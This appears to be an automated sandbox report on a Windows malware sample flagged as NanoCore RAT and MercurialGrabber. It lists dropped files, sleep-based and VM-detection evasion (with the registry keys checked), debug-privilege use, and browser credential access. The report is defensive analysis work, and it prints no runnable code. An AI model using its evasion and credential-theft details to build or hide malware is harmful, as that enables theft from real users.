Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\output.exe			Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\nano.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\output.exe	Jump to dropped file
Source: C:\ProgramData\nano.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\ProgramData\nano.exe

File opened: C:\ProgramData\nano.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe TID: 6916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\nano.exe TID: 5884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\nano.exe TID: 6292	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99843s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99733s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99624s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99515s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99279s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99168s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99060s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98952s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98623s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98515s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98406s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99937s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 5512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 2880	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\nano.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\ProgramData\nano.exe	Window / User API: threadDelayed 890	Jump to behavior
Source: C:\ProgramData\nano.exe	Window / User API: foregroundWindowGot 1016	Jump to behavior
Source: C:\ProgramData\nano.exe	Window / User API: foregroundWindowGot 383	Jump to behavior
Source: C:\ProgramData\output.exe	Window / User API: threadDelayed 976	Jump to behavior
Source: C:\ProgramData\output.exe	Window / User API: threadDelayed 2661	Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\ProgramData\output.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosInformation	Jump to behavior
Source: C:\ProgramData\output.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0	Jump to behavior
Source: C:\ProgramData\output.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\ProgramData\nano.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\nano.exe

Code function: 2_2_054D12DA GetSystemInfo,

2_2_054D12DA

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\nano.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99843	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99733	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99624	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99515	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99279	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99168	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99060	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98952	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98623	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98515	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98406	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99937	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: output.exe.0.dr	Binary or memory string: SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp	Binary or memory string: ISYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp	Binary or memory string: KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: output.exe.0.dr	Binary or memory string: vmware
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	Binary or memory string: virtualboxvboxqemu
Source: output.exe	Binary or memory string: SOFTWARE\VMWare, Inc.\VMWare Tools
Source: nano.exe, 00000002.00000003.407019880.00000000012A5000.00000004.00000001.sdmp, nano.exe, 00000002.00000003.418108380.00000000012A6000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.551166452.000000000125C000.00000004.00000020.sdmp, nano.exe, 00000002.00000003.363174186.00000000012BB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: output.exe	Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: nano.exe, 00000002.00000003.407019880.00000000012A5000.00000004.00000001.sdmp, nano.exe, 00000002.00000003.418108380.00000000012A6000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.551166452.000000000125C000.00000004.00000020.sdmp, nano.exe, 00000002.00000003.363174186.00000000012BB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^#C
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp	Binary or memory string: "SOFTWARE\VMWare, Inc.\VMWare Tools
Source: output.exe.0.dr	Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdevkSYSTEM\CurrentControlSet\Control\VirtualDeviceDriversESOFTWARE\VMWare, Inc.\VMWare ToolsUSOFTWARE\Oracle\VirtualBox Guest Additions1HARDWARE\ACPI\DSDT\VBOX_SSYSTEM\ControlSet001\Services\Disk\Enum\0cHARDWARE\Description\System\SystemBiosInformationYHARDWARE\Description\System\VideoBiosVersion]HARDWARE\Description\System\SystemManufacturer[HARDWARE\Description\System\SystemProductName[HARDWARE\Description\System\Logical Unit Id 0
Source: output.exe, 00000005.00000002.301549791.00000000009A0000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS

Anti Debugging:

Enables debug privileges

Source: C:\ProgramData\nano.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\ProgramData\output.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"			Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"			Jump to behavior

Source: nano.exe, 00000002.00000002.552908452.000000000332B000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\ProgramData\output.exe

Queries volume information: C:\ProgramData\output.exe VolumeInformation

Jump to behavior

Queries the product ID of Windows

Source: C:\ProgramData\output.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\ProgramData\nano.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\ProgramData\nano.exe

Code function: 2_2_011DAF9A GetUserNameW,

2_2_011DAF9A

Stealing of Sensitive Information:

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\output.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data

Jump to behavior

Remote Access Functionality:

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Detected Nanocore Rat

Source: 4Y85lSOUJ0.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe	String found in binary or memory: NanoCore.ClientPluginHost
